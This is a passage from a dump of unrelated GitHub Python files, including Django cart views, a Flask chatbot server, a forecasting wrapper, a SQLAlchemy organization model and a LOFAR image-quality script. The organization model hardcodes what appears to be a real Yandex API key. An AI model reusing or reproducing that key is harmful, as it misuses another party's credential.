template_name = 'check_my_cart.html'\n context_object_name = 'qs'\n def get_queryset(self):\n qs = Cart.objects.filter(userid=self.request.user)\n return qs\n \n@login_required(login_url='../accounts/login/')\ndef place_order(request):\n if request.method == 'POST':\n form = DeliverInfo(request.POST)\n if form.is_valid():\n locationx = form.cleaned_data[\"location_x\"]\n locationy = form.cleaned_data[\"location_y\"] \n ups_name = form.cleaned_data[\"ups_username\"]\n user_cart = Cart.objects.filter(userid = request.user)\n products = \"\"\n for (i, product) in enumerate(user_cart):\n inventory = get_object_or_404(Warehouse, product_name = product.product_name)\n if inventory.total_number < product.count:\n order_status = \"Order failed:\" + product.product_name + \" is out of stock\"\n messages.success(request, order_status)\n return redirect('/')\n products += product.product_name + \",\" + str(product.count) + \"-\"\n products = products[:-1]\n back_end_request = \"new order:\" + str(request.user.id) + \"-\" + products + \"-\" + str(locationx) + \"-\" + str(locationy) + \"-\" + ups_name + \"\\n\"\n back_end_socket.send(back_end_request.encode())\n messages.success(request, \"Order succeed!\")\n return redirect('/')\n else:\n form = DeliverInfo(initial = {\"location_x\": request.user.location_x, \"location_y\": request.user.location_y, \"ups_username\": request.user.ups_name})\n return render(request, 'place_order.html', context={'form': form})\n\nclass view_my_order(LoginRequiredMixin, ListView):\n template_name = 'order_list_1.html'\n context_object_name = 'order_list'\n def get_queryset(self): \n return Order.objects.filter(owner = self.request.user)\n \nclass CartUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):\n model = Cart\n fields = ['count']\n template_name = 'item_update.html'\n \n def form_valid(self, form):\n item = self.get_object()\n item.count = form.cleaned_data.get('count')\n back_end_request = \"purchase more:\" + item.product_name+ \"-\" + str(item.count) + \"\\n\"\n back_end_socket.send(back_end_request.encode())\n item.save()\n return super(CartUpdateView, self).form_valid(form)\n\n def test_func(self):\n item = self.get_object()\n if self.request.user == item.userid:\n return True\n return False \n\n def get_success_url(self):\n messages.success(self.request, 'Cart Updated')\n success_url = '/amazon/myCart' \n return success_url\n\n'''\n@login_required\ndef CartUpdateView(request, cart_pk):\n template_name = 'item_update.html'\n\n form = CartForm()\n if request.method == \"POST\":\n form = CartForm(request.POST)\n if form.is_valid():\n new_count = form.cleaned_data.get(\"count\")\n item = Cart.objects.get(pk = cart_pk)\n item.count = new_count\n item.save()\n back_end_request = \"purchase more:\" + item.product_name+ \"-\" + str(new_count) + \"\\n\"\n back_end_socket.send(back_end_request.encode())\n\n return redirect(\"/amazon/myCart\")\n\n else:\n return render(request, template_name, context = { \"form\"})\n'''","repo_name":"xwgnick/MiniAmzon","sub_path":"Amazon/code/FrontEnd/amazonapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"11910998647","text":"#!/usr/bin/env python3\n\nimport os\nimport argparse\nimport glob\n# parser = argparse.ArgumentParser(description=\"\"\"get text from transcripts\"\"\")\n# parser.add_argument('input_transcript', type=str, help='File name of a file that contains the'\n# 'text. 
Each line must be: ...')\n# parser.add_argument('output_transcript', type=str, help='Output file that contains transcript')\ndef main():\n\n    # args = parser.parse_args()\n    # input_transcript = '/Users/ashisharora/Desktop/root/corpora/TDCorpus/topic_text'\n    # text_file_handle = open(input_transcript, 'r', encoding='utf8')\n    # text_file_data = text_file_handle.read().strip().split(\"\\n\")\n    list_of_files = glob.glob('/Users/ashisharora/Desktop/root/corpora/TDCorpus/topics/*.txt')\n    output_transcript = '/Users/ashisharora/Desktop/root/corpora/TDCorpus/topic_text'\n    output_transcript_handle = open(output_transcript, 'w', encoding='utf8')\n    for file_name in list_of_files:\n        text_file_handle = open(file_name, 'r', encoding='utf8')\n        text_file_data = text_file_handle.read().strip().split(\"\\n\")\n        file_name = file_name.strip().split('/')[-1]\n        for line in text_file_data:\n            parts = line.strip().split()\n            topic_info = \" \".join(parts)\n            output = file_name + ' ' + topic_info\n            output_transcript_handle.write(output + '\\n')\n\n\nif __name__ == '__main__':\n    main()","repo_name":"aarora8/single_file_scripts","sub_path":"analysing_topics/fix_spaces_in_transcript.py","file_name":"fix_spaces_in_transcript.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"72680290107","text":"from gevent import monkey\n\nmonkey.patch_all()\nfrom flask import Flask, render_template, request, jsonify\nimport tensorflow as tf\nimport numpy as np\nfrom s2s import create_model, FLAGS\nimport data_utils\n\nbuckets = data_utils.buckets\napp = Flask(__name__)\n\n\nclass TestBucket(object):\n    def __init__(self, sentence):\n        self.sentence = sentence\n\n    def random(self):\n        return self.sentence, ''\n\n\ngpu_memory_fraction = 0.5\ngpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=gpu_memory_fraction, allow_growth=True)\nsess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options, log_device_placement=False))\n# build the model\nmodel = create_model(sess, True)\nmodel.batch_size = 1\n# initialize variables\nsess.run(tf.global_variables_initializer())\nwith tf.Graph().as_default():\n    ckpt = tf.train.get_checkpoint_state(FLAGS.model_dir)\n    if ckpt and ckpt.model_checkpoint_path:\n        model.saver.restore(sess, ckpt.model_checkpoint_path)\n    else:\n        raise FileNotFoundError('Having no model')  # Get input and output tensors\n\n\n    # serve the home page\n    @app.route('/')\n    def index():\n        return render_template('index.html')\n\n\n    # generate a reply\n    @app.route('/chart')\n    def chart():\n        # get the text passed in from the front end\n        sentence = request.args.get('sentence')\n\n        # # 1. 
intent recognition\n        # flag = model1.predict(sentence)\n        # if flag == 'intent1':\n        #     # invoke\n        #     ret = chat_model1.predict(buckets, sentence, TestBucket(sentence), sess)\n        # elif flag == 'intent2':\n        #     # invoke\n        #     ret = chat_model2.predict(buckets, sentence, TestBucket(sentence), sess)\n        # elif flag == 'intent3':\n        #     # invoke\n        #     ret = chat_model3.predict(buckets, sentence, TestBucket(sentence), sess)\n        # else:\n        #     # chit-chat mode\n        #     ret = model.predict(buckets, sentence, TestBucket(sentence), sess)\n\n        # invoke the chat model\n        ret = model.predict(buckets, sentence, TestBucket(sentence), sess)\n        return jsonify({'state': 0, 'result': ret})\n\nif __name__ == '__main__':\n    app.run(host=\"192.168.1.9\", port=\"8888\")\n","repo_name":"exueyuan/ChatBotYellowChicken","sub_path":"sever.py","file_name":"sever.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"26932254615","text":"import pytest\nimport json\nimport requests\nfrom Common.params import Params\nfrom Conf.Config import Config\nfrom Common import Assert\n\n\nclass TestLauncherIsConfig:\n    def test_response_data_format(self):\n        \"\"\"\n        Test case description: check the status code returned by the course/timetable configuration query endpoint with default parameters, and validate the response format against the JSON Schema\n        :return:\n        \"\"\"\n        conf = Config()\n        test = Assert.Assertions()\n\n        host = conf.debug_goss_host\n        api_url = host + \"/api/v1/launcher/isConfig\"\n        headers = conf.debug_headers\n        params = Params().non_encrypted_data({'sourceId': '10001', 'sourceType': 2})\n\n        res = requests.post(api_url, params=params, headers=headers)\n        schema = json.load(open(conf.json_schema_path + \"/launcher_is_config_schema.json\"))\n\n        assert test.assert_code(res.status_code, 200)\n        assert test.assert_jsonschema(res.json(), schema)\n\n\nif __name__ == '__main__':\n    pytest.main()\n","repo_name":"UncleLiketao/API_AutoTest_Framework_Python","sub_path":"TestCase/test_launcher3/test_launcher_is_config.py","file_name":"test_launcher_is_config.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"24477306821","text":"#!/usr/bin/env python\n\nimport sys as sys\nimport os\n\nfrom afnipy import afni_util as au\n\nprint(\"+* [PT: Jan 13, 2022] Turning this off at the moment; \"\n      \"maybe revisit later\")\nsys.exit(0)\n\n\nTHIS_PROG = 'make_substeps_of_quickbuilds.py'\nNUM_ARGS  = 1\n\n# ===================================================================\n\nVERSION   = \"1.0\"\nVER_DATE  = \"Mar 29, 2018\"\nAUTHOR    = \"PA Taylor (NIMH, NIH)\"\n\nhelp_string = '''\n--------------------------------------------------------------------\nHelpfile for:    *** %s ***\nVersion num:     %s\nVersion dat:     %s\nWritten by:      %s\n\nTakes %d arguments: \n   1) an output directory name\n--------------------------------------------------------------------\n\n''' % (THIS_PROG, VERSION, VER_DATE, AUTHOR, NUM_ARGS)\n\n# =================================================================\n\n\n\n\n# =================================================================\n\ndef make_hidden_code_block_header( starthidden='True', \n                                   hcb_format='none',\n                                   label='- show script y/n -',\n                                   nempty=2,\n                                   lspace=3):\n    \"\"\"\n    Make a hidden-code-block in RST; a couple params get entered.\n    \"\"\"\n\n    lpad = ' '*lspace\n    jstr = '\\n' + lpad\n\n    hcb_list = []\n    hcb_list.append( '''.. 
hidden-code-block:: {}'''.format(hcb_format))\n hcb_list.append( ''' :starthidden: {}'''.format(starthidden))\n hcb_list.append( ''' :label: {}'''.format(label))\n\n for i in range(nempty):\n hcb_list.append( '')\n\n return lpad + jstr.join(hcb_list)\n\ndef make_code_block_header( cb_format='none',\n nempty=2):\n \"\"\"\n Make a code-block in RST; a couple params get entered.\n \"\"\"\n\n jstr = '\\n'\n\n cb_list = []\n cb_list.append( '''.. code-block:: {}'''.format(cb_format))\n\n for i in range(nempty):\n cb_list.append( '')\n\n return jstr.join(cb_list)\n\n# ---------------------------------------------------------------------\n\ndef get_arg(aa):\n Narg = len(aa)\n \n if Narg == 0:\n print( help_string )\n sys.exit(0)\n elif Narg < NUM_ARGS:\n sys.exit(\"** ERROR: too few args!\\n\"\n \" Need one input file name (contains all tips),\\n\"\n \" and an output fname.\")\n elif Narg > NUM_ARGS:\n sys.exit(\"** ERROR: too many args! See help.\")\n else:\n odir = aa[0] # output dir name\n\n print( \"++ odir : {}\".format( odir ))\n\n return odir\n\n# ---------------------------------------------------------------------\n\ndef parse_data_file_top(H, lspace=3):\n \"\"\"\n We assume each top-of-file contains 5 lines:\n + \"Quick\" ... comment\n + comment about tcsh/bash\n + actual command\n + comment about tcsh/bash\n + actual command\n \"\"\"\n \n lpad = \" \"*lspace\n\n N = len(H)\n nstart = -1\n\n for ii in range(N):\n line = H[ii].split()\n if len(line) > 1 :\n if line[1] == \"Quick\" :\n nstart = ii\n break\n\n if nstart < 0 :\n print(\"** ERROR: couldn't find keyword 'Quick' starting a line!\\n\"\n \" I am lost with how to process this file\")\n sys.exit(1)\n\n out = []\n # skip \"Quick\" line\n for ii in [nstart+1, nstart+3]:\n out.append(lpad + \"* *... 
\" + H[ii][1:].strip()[:-1] + '*::\\n')\n out.append(lpad + \" \" + \" \" + H[ii+1][1:].strip() + '\\n')\n\n return out\n\n# ---------------------------------------------------------------------\n\ndef write_out_quickbuild_substep(ofile, ttt):\n fff = open(ofile, 'w')\n\n fff.writelines(ttt)\n fff.close()\n\n\n# ====================================================================\n\nclass quickbuild:\n\n def __init__(self, name, tip, num):\n self.package = name\n self.links = []\n self.nlinks = 0\n\n# ====================================================================\n\nif __name__==\"__main__\":\n\n # --------------------- get input ------------------------\n\n print( \"++ Command line:\\n {}\".format(' '.join(sys.argv) ))\n odir = get_arg(sys.argv[1:])\n\n # where to get stuff, from the interweb\n base_path = \"https://raw.githubusercontent.com/afni/afni/\"\n base_path+= \"master/src/other_builds\"\n\n # ----------------------------------------------------------\n this_sys = 'linux_ubuntu_20_64'\n oname_sys = 'substep_quickbuild_' + this_sys\n \n list_files = []\n list_comms = []\n\n comm = '''To install packages requiring admin privileges '''\n comm+= '''('sudo' password required)...'''\n list_files.append('OS_notes.linux_ubuntu_20_64_a_admin.txt')\n list_comms.append(comm)\n \n comm = '''To install other dependencies (**don't** use 'sudo' here)...'''\n list_files.append('OS_notes.linux_ubuntu_20_64_b_user.tcsh')\n list_comms.append(comm)\n\n comm = '''To niceify your terminal (optional, but useful)...'''\n list_files.append('OS_notes.linux_ubuntu_20_64_c_nice.tcsh')\n list_comms.append(comm)\n \n # download files\n nfiles = len(list_files)\n list_data = []\n list_curl = []\n\n for ii in range(nfiles):\n ifile = list_files[ii]\n curler = \"curl -O %s/%s\" % (base_path, ifile)\n os.system(curler)\n list_curl.append(curler)\n\n fff = open(ifile, 'r')\n data = fff.readlines()\n fff.close()\n list_data.append(data)\n\n\n # build text string\n otext = \"\"\n\n otext+= '\\n\\n'\n\n otext+= '''This is a briefer form of the above setup instructions.\\n'''\n otext+= '''It includes downloading the Bootcamp data and running\\n'''\n otext+= '''the system check (so don't forget to check that!).\\n'''\n\n otext+= '\\n\\n'\n\n otext+= '''There are 3 scripts to run.\\n'''\n otext+= '''To download them, copy+paste:'''\n otext+= '\\n\\n'\n\n # code-block: curl commands\n hdr_cb = make_code_block_header()\n otext+= hdr_cb\n otext+= ' ' + 'cd\\n'\n otext+= ' ' + '\\n '.join(list_curl)\n otext+= '\\n\\n'\n\n otext+= \"Then run each of them, as described below.\\n\"\n otext+= \"(Each creates a log file, for checking and/or asking questions.)\\n\"\n otext+= '\\n\\n'\n\n lspace = 3\n lpad = ' '*lspace\n\n # hidden-code-block: each file\n for ii in range(nfiles):\n\n otext+= \"#. 
\" + list_comms[ii]\n otext+= '\\n\\n'\n\n run_cmd = parse_data_file_top(list_data[ii])\n otext+= '\\n'.join(run_cmd)\n otext+= '\\n\\n'\n\n hdr_hcb = make_hidden_code_block_header()\n otext+= hdr_hcb\n jstr = lpad + ' '\n otext+= ' ' + jstr.join(list_data[ii])\n otext+= '\\n\\n'\n otext+= lpad + '|\\n'\n\n write_out_quickbuild_substep(odir + '/' + oname_sys + '.rst', \n otext)\n\n print(\"++ Done writing RST for quickbuild instructions!\")\n\n sys.exit(0)\n","repo_name":"afni/afni_doc","sub_path":"python_help_scripts/make_substeps_of_quickbuilds.py","file_name":"make_substeps_of_quickbuilds.py","file_ext":"py","file_size_in_byte":6851,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"29809650782","text":"\ndef search(sequence, expected, finder):\n for elem in sequence:\n if finder(elem) == expected:\n return elem\n raise RuntimeError(f\"Could not find element {expected}\")\n\n\nfriends = [\n {\"name\": \"Bob Rock\", \"age\": 24},\n {\"name\": \"Jack Daniels\", \"age\": 25},\n {\"name\": \"Stew A\", \"age\": 26}]\n\n\n# def get_name(friend):\n# return friend[\"name\"]\n\n\n# print(search(friends, \"Bob Rock\", get_name))\n\nprint(search(friends, \"Bob Rock\", lambda friend: friend[\"name\"]))\n","repo_name":"aliaksei-d/rest_api_with_flask_and_python_full_version","sub_path":"first_class_fynctions.py","file_name":"first_class_fynctions.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"70943720188","text":"import pandas as pd\nimport numpy as np\n\ntry:\n from autots import AutoTS, model_forecast\nexcept ImportError:\n print('Does not found AutoTS library. Continue...')\n\nfrom pytsbe.data.forecast_output import ForecastResults\nfrom pytsbe.models.forecast import Forecaster\n\nimport logging\nlogging.raiseExceptions = False\n\n\nclass AutoTSForecaster(Forecaster):\n \"\"\"\n Class for time series forecasting with AutoTS library\n Source code: https://github.com/winedarksea/AutoTS\n \"\"\"\n\n def __init__(self, **params):\n super().__init__(**params)\n default_params = {'frequency': 'infer', 'prediction_interval': 0.9,\n 'ensemble': 'all', 'model_list': 'superfast',\n 'max_generations': 10, 'num_validations': 2}\n if params is not None:\n self.params = {**default_params, **params}\n else:\n self.params = default_params\n\n def fit_univariate_ts(self, historical_values: pd.DataFrame, forecast_horizon: int, **kwargs):\n frequency = self.params.get('frequency')\n prediction_interval = self.params.get('prediction_interval')\n ensemble = self.params.get('ensemble')\n model_list = self.params.get('model_list')\n max_generations = self.params.get('max_generations')\n num_validations = self.params.get('num_validations')\n\n self.model = AutoTS(forecast_length=forecast_horizon,\n frequency=frequency,\n prediction_interval=prediction_interval,\n ensemble=ensemble,\n model_list=model_list,\n max_generations=max_generations,\n num_validations=num_validations,\n validation_method=\"backwards\")\n\n self.model.fit(historical_values, date_col='datetime', value_col='value')\n\n def fit_multivariate_ts(self, historical_values: pd.DataFrame, forecast_horizon: int,\n target_column: str, predictors_columns: list, **kwargs):\n raise NotImplementedError('AutoTs does not support fit for multivariate time series forecasting')\n\n def predict_univariate_ts(self, historical_values: pd.DataFrame, forecast_horizon: int,\n **kwargs) -> ForecastResults:\n 
\"\"\" Use obtained model to make predictions \"\"\"\n forecasts_df = model_forecast(model_name=self.model.best_model_name,\n model_param_dict=self.model.best_model_params,\n model_transform_dict=self.model.best_model_transformation_params,\n df_train=historical_values.set_index('datetime'),\n forecast_length=forecast_horizon,\n frequency=self.params.get('frequency'),\n prediction_interval=self.params.get('prediction_interval'),\n no_negatives=False)\n\n forecast = np.ravel(np.array(forecasts_df.forecast['value']))\n # For now save only forecasts - possible to extend\n result = ForecastResults(predictions=forecast)\n return result\n\n def predict_multivariate_ts(self, historical_values: pd.DataFrame, forecast_horizon: int,\n target_column: str, predictors_columns: list, **kwargs):\n raise NotImplementedError('AutoTs forecaster does not support predict for multivariate time series forecasting')\n","repo_name":"ITMO-NSS-team/pytsbe","sub_path":"pytsbe/models/autots_forecaster.py","file_name":"autots_forecaster.py","file_ext":"py","file_size_in_byte":3558,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"6"} +{"seq_id":"16103339512","text":"def check(value, banArr):\n for i in range (0, len(banArr)):\n for j in range (0, len(str(value))):\n if (int(str(value)[j]) == banArr[i]):\n return 1\n return 0\n\n\ngoal = int(input());\nbanNum = int(input());\nbanArr = list(map(int, input().split()))\n\n\nupside = goal\nwhile check(upside, banArr):\n upside += 1\n\n\ndownside = goal\nwhile check(downside, banArr) and downside >= 0:\n downside -= 1\n\nif (abs(goal - 100) <= abs(goal - upside) or abs(goal - 100) <= abs(goal - downside)):\n print(int(abs(goal - 100)))\nelif (abs(goal - upside) >= abs(goal - downside)):\n print(int(abs(goal - downside)) + len(str(int(downside))))\nelse:\n print(int(abs(goal - upside)) + len(str(int(upside))))\n\nexit (0)","repo_name":"hynoes/baekjoon","sub_path":"bj1157_soomin4.py","file_name":"bj1157_soomin4.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"20165322899","text":"# Напишите функцию, которая сохраняет созданный в\n# прошлом задании файл в формате CSV.\nimport json\nimport csv\n\n\ndef json_to_csv(filename: str):\n with open(f'{filename}.json', 'r') as f_inp:\n data = json.load(f_inp)\n rows = []\n for level, users in data.items():\n for id, name in users.items():\n rows.append({'level': level,\n 'name': name,\n 'id': id})\n with open(f'{filename}.csv', 'w', newline='') as res:\n csv_write = csv.DictWriter(res, fieldnames=['level',\n 'name',\n 'id'])\n csv_write.writeheader()\n csv_write.writerows(rows)\n\n\ndef read_csv(filename: str):\n with open(f'{filename}.csv', 'r', encoding='UTF-8') as inp:\n data = inp.read().split('\\n')\n res = []\n for value in data[:-1]:\n print(value)\n level, name, id = value[:].split(',')\n res.append({'id': f'{id:06}', 'level': level, 'name': name, 'hash': hash(id + name)})\n\n with open(f'{filename}new.json', 'w', encoding='UTF-8') as out:\n json.dump(res, out, indent=4)\n\n\nif __name__ == '__main__':\n # json_to_csv('users')\n read_csv('users')\n","repo_name":"wahek/pythonDepth_8_hw","sub_path":"pythonDepth_8/task3_3.py","file_name":"task3_3.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"8460021976","text":"import torch\nimport utils as utils\nfrom torch.utils.data import 
Dataset,DataLoader\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler\nimport config as config\nclass RummorDataset(Dataset):\n\n    def __init__(self,model=\"train\"):\n        super(RummorDataset, self).__init__()\n\n        self.contents,self.labels,self.comments,self.likes,self.reposts =utils.get_df()\n        self.comments,self.likes,self.reposts=torch.tensor(self.comments).reshape(1, -1),torch.tensor(self.likes).reshape(1, -1),torch.tensor(self.reposts).reshape(1, -1)\n        minmax_c = MinMaxScaler()\n        minmax_c.fit(self.comments)\n        self.comments = minmax_c.transform(self.comments)\n        minmax_l = MinMaxScaler()\n        minmax_l.fit(self.likes)\n        self.likes = minmax_l.transform(self.likes)\n        minmax_r = MinMaxScaler()\n        minmax_r.fit(self.reposts)\n        self.reposts = minmax_r.transform(self.reposts)\n        self.contents=utils.key_to_index(self.contents,utils.word2vec,config.num_words)\n\n        self.maxlen=utils.get_maxlength(self.contents)\n\n        self.contents=utils.padding_truncating(self.contents,self.maxlen)\n        x_train,x_test,c_train,c_test,l_train,l_test,r_train,r_test,y_train,y_test=train_test_split(self.contents,self.comments.reshape(-1).tolist(),self.likes.reshape(-1).tolist(),self.reposts.reshape(-1).tolist(),self.labels,test_size=0.2,shuffle=True,random_state=0)\n        if model==\"train\":\n            self.contents=x_train\n            self.comments=c_train\n            self.likes=l_train\n            self.reposts=r_train\n            self.labels=y_train\n        elif model==\"test\":\n            self.contents = x_test\n            self.comments =c_test\n            self.likes=l_test\n            self.reposts=r_test\n            self.labels = y_test\n\n    def __getitem__(self, item):\n        return torch.tensor(self.contents[item]),torch.tensor(self.comments[item]).view(-1,1),torch.tensor(self.likes[item]).view(-1,1),torch.tensor(self.reposts[item]).view(-1,1),torch.tensor(self.labels[item])\n\n    def __len__(self):\n        return len(self.contents)\n\ndef get_dataloader(model=\"train\"):\n    dataset=RummorDataset(model=model)\n    return DataLoader(dataset,batch_size=config.batch_size,shuffle=True if model==\"train\" else False)\n\n\n","repo_name":"Levi-Ackman/AI_EXP_Tasks_2","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"6122366241","text":"# -*- coding: utf-8 -*-\n\nimport sqlalchemy\nfrom sqlalchemy import orm\nfrom .db_session import SqlAlchemyBase\nfrom flask_login import UserMixin\nfrom sqlalchemy_serializer import SerializerMixin\nimport requests\n\n\nclass Organization(SqlAlchemyBase, UserMixin, SerializerMixin):\n    __tablename__ = 'organizations'\n\n    id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True, autoincrement=True)\n\n    organization_name = sqlalchemy.Column(sqlalchemy.Text)\n\n    description = sqlalchemy.Column(sqlalchemy.Text)\n\n    owner_id = sqlalchemy.Column(sqlalchemy.Integer, sqlalchemy.ForeignKey(\"users.id\"), nullable=True)\n\n    address = sqlalchemy.Column(sqlalchemy.Text)\n\n    contact_number = sqlalchemy.Column(sqlalchemy.Text)\n\n    owner = orm.relation('User', back_populates='organizations')\n\n    logo = sqlalchemy.Column(sqlalchemy.Text)\n\n    address_ll = sqlalchemy.Column(sqlalchemy.Text)\n\n    def set_address_ll(self):\n        api_server = \"http://geocode-maps.yandex.ru/1.x/\"\n\n        params = {\n            \"apikey\": '40d1649f-0493-4b70-98ba-98533de7710b',\n            \"format\": 'json',\n            \"geocode\": self.address\n        }\n        response = requests.get(api_server, params=params)\n        if response:\n            json_response = response.json()\n            toponym = 
json_response[\"response\"][\"GeoObjectCollection\"][\"featureMember\"][0][\"GeoObject\"]\n toponym_address = toponym[\"metaDataProperty\"][\"GeocoderMetaData\"][\"text\"]\n self.address_ll = \",\".join(toponym[\"Point\"][\"pos\"].split())\n self.address = toponym_address\n\n map_params = {\n \"ll\": self.address_ll,\n \"spn\": \"0.005,0.005\",\n \"l\": \"map\",\n 'pt': ','.join(self.address_ll.split() + ['org'])\n }\n\n map_api_server = \"http://static-maps.yandex.ru/1.x/\"\n response = requests.get(map_api_server, params=map_params)\n map_file = f\"static/img/{self.address_ll}.png\"\n with open(map_file, \"wb\") as file:\n file.write(response.content)\n else:\n raise Exception('Address is wrong')\n","repo_name":"oqyshi/Oqyshi","sub_path":"data/organization.py","file_name":"organization.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"21158852810","text":"#!/usr/bin/env python\n\n# Routine to check quality of LOFAR images\nfrom __future__ import print_function\nfrom __future__ import division\nfrom past.utils import old_div\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nimport os,sys\nimport os.path\nfrom quality_parset import option_list\nfrom options import options,print_options\nfrom astropy.io import fits\nfrom astropy.table import Table\ntry:\n import bdsf as bdsm\nexcept ImportError:\n import lofar.bdsm as bdsm\nfrom auxcodes import report,get_rms,warn,die,sepn,get_centpos\nimport numpy as np\nfrom crossmatch_utils import match_catalogues,filter_catalogue,select_isolated_sources,bootstrap\nfrom quality_make_plots import plot_flux_ratios,plot_flux_errors,plot_position_offset\nfrom facet_offsets import label_table,RegPoly,plot_offsets\nfrom dr_checker import do_dr_checker\nfrom surveys_db import SurveysDB,get_id,use_database\n\n#Define various angle conversion factors\narcsec2deg=1.0/3600\narcmin2deg=1.0/60\ndeg2rad=old_div(np.pi,180)\ndeg2arcsec = 1.0/arcsec2deg\nrad2deg=180.0/np.pi\narcmin2rad=arcmin2deg*deg2rad\narcsec2rad=arcsec2deg*deg2rad\nrad2arcmin=1.0/arcmin2rad\nrad2arcsec=1.0/arcsec2rad\nsteradians2degsquared = (180.0/np.pi)**2.0\ndegsquared2steradians = 1.0/steradians2degsquared\n\ndef logfilename(s,options=None):\n if options is None:\n options=o\n if options['logging'] is not None:\n return options['logging']+'/'+s \n else:\n return None\n\ndef filter_catalog(singlecat,matchedcat,fitsimage,outname,auxcatname,options=None):\n if options is None:\n options = o\n\n if options['restart'] and os.path.isfile(outname):\n warn('File ' + outname +' already exists, skipping source filtering step')\n else:\n\n matchedcat = Table.read(matchedcat)\n singlecat = Table.read(singlecat)\n\n fitsimage = fits.open(fitsimage)\n\n fieldra = fitsimage[0].header['CRVAL1']\n fielddec = fitsimage[0].header['CRVAL2']\n fitsimage.close()\n\n print('Originally',len(matchedcat),'sources')\n matchedcat=filter_catalogue(matchedcat,fieldra,fielddec,3.0)\n\n print('%i sources after filtering for 3.0 deg from centre' % len(matchedcat))\n\n matchedcat=matchedcat[matchedcat['DC_Maj']<10.0] # ERROR!\n\n print('%i sources after filtering for sources over 10arcsec in LOFAR' % len(matchedcat))\n\n # not implemented yet!\n #tooextendedsources_aux = np.array(np.where(matchedcat[1].data[options['%s_match_majkey2'%auxcatname]] > options['%s_filtersize'%auxcatname])).flatten()\n #print '%s out of %s sources filtered out as over %sarcsec in 
%s'%(np.size(tooextendedsources_aux),len(allsources),options['%s_filtersize'%auxcatname],auxcatname)\n\n matchedcat=select_isolated_sources(matchedcat,30.0)\n print('%i sources after filtering for isolated sources in LOFAR' % len(matchedcat))\n\n matchedcat.write(outname)\n\ndef sfind_image(catprefix,pbimage,nonpbimage,sfind_pixel_fraction,options=None):\n\n if options is None:\n options = o\n f = fits.open(nonpbimage)\n imsizex = f[0].header['NAXIS1']\n imsizey = f[0].header['NAXIS2']\n f.close()\n kwargs={}\n if options['sfind_pixel_fraction']<1.0:\n lowerx,upperx = int(((1.0-sfind_pixel_fraction)/2.0)*imsizex),int(((1.0-sfind_pixel_fraction)/2.0)*imsizex + sfind_pixel_fraction*imsizex)\n lowery,uppery = int(((1.0-sfind_pixel_fraction)/2.0)*imsizey),int(((1.0-sfind_pixel_fraction)/2.0)*imsizey + sfind_pixel_fraction*imsizey)\n kwargs['trim_box']=(lowerx,upperx,lowery,uppery)\n\n if options['restart'] and os.path.isfile(catprefix +'.cat.fits'):\n warn('File ' + catprefix +'.cat.fits already exists, skipping source finding step')\n else:\n img = bdsm.process_image(pbimage, detection_image=nonpbimage, thresh_isl=4.0, thresh_pix=5.0, rms_box=(160,50), rms_map=True, mean_map='zero', ini_method='intensity', adaptive_rms_box=True, adaptive_thresh=150, rms_box_bright=(60,15), group_by_isl=False, group_tol=10.0,output_opts=True, output_all=True, atrous_do=True,atrous_jmax=4, flagging_opts=True, flag_maxsize_fwhm=0.5,advanced_opts=True, ncores=options['NCPU'], blank_limit=None,**kwargs)\n img.write_catalog(outfile=catprefix +'.cat.fits',catalog_type='srl',format='fits',correct_proj='True')\n img.export_image(outfile=catprefix +'.rms.fits',img_type='rms',img_format='fits',clobber=True)\n img.export_image(outfile=catprefix +'.resid.fits',img_type='gaus_resid',img_format='fits',clobber=True)\n img.export_image(outfile=catprefix +'.pybdsmmask.fits',img_type='island_mask',img_format='fits',clobber=True)\n img.write_catalog(outfile=catprefix +'.cat.reg',catalog_type='srl',format='ds9',correct_proj='True')\n\ndef crossmatch_image(lofarcat,auxcatname,options=None,catdir='.'):\n\n if options is None:\n options = o\n auxcat = options[auxcatname]\n crossmatchname=lofarcat + '_' + auxcatname + '_match.fits'\n if options['restart'] and os.path.isfile(crossmatchname):\n warn('File ' + crossmatchname+ ' already exists, skipping source matching step')\n t=Table.read(crossmatchname)\n matches=len(t)\n del(t)\n else:\n t=Table.read(lofarcat)\n tab=Table.read(catdir+'/'+auxcat)\n matches=match_catalogues(t,tab,o[auxcatname+'_matchrad'],auxcatname)\n t=t[~np.isnan(t[auxcatname+'_separation'])]\n t.write(lofarcat+'_'+auxcatname+'_match.fits')\n return matches\n \ndef do_plot_facet_offsets(t,regfile,savefig=None):\n ''' convenience function to plot offsets '''\n if savefig is not None and os.path.isfile(savefig):\n warn('Figure file %s exists, not re-making it' % savefig)\n else:\n cra,cdec=get_centpos()\n r=RegPoly(regfile,cra,cdec)\n if isinstance(t,str):\n t=Table.read(t)\n if 'Facet' not in t.columns:\n r.add_facet_labels(t)\n plot_offsets(t,r.clist,'red')\n if savefig is not None:\n plt.savefig(savefig)\n\nif 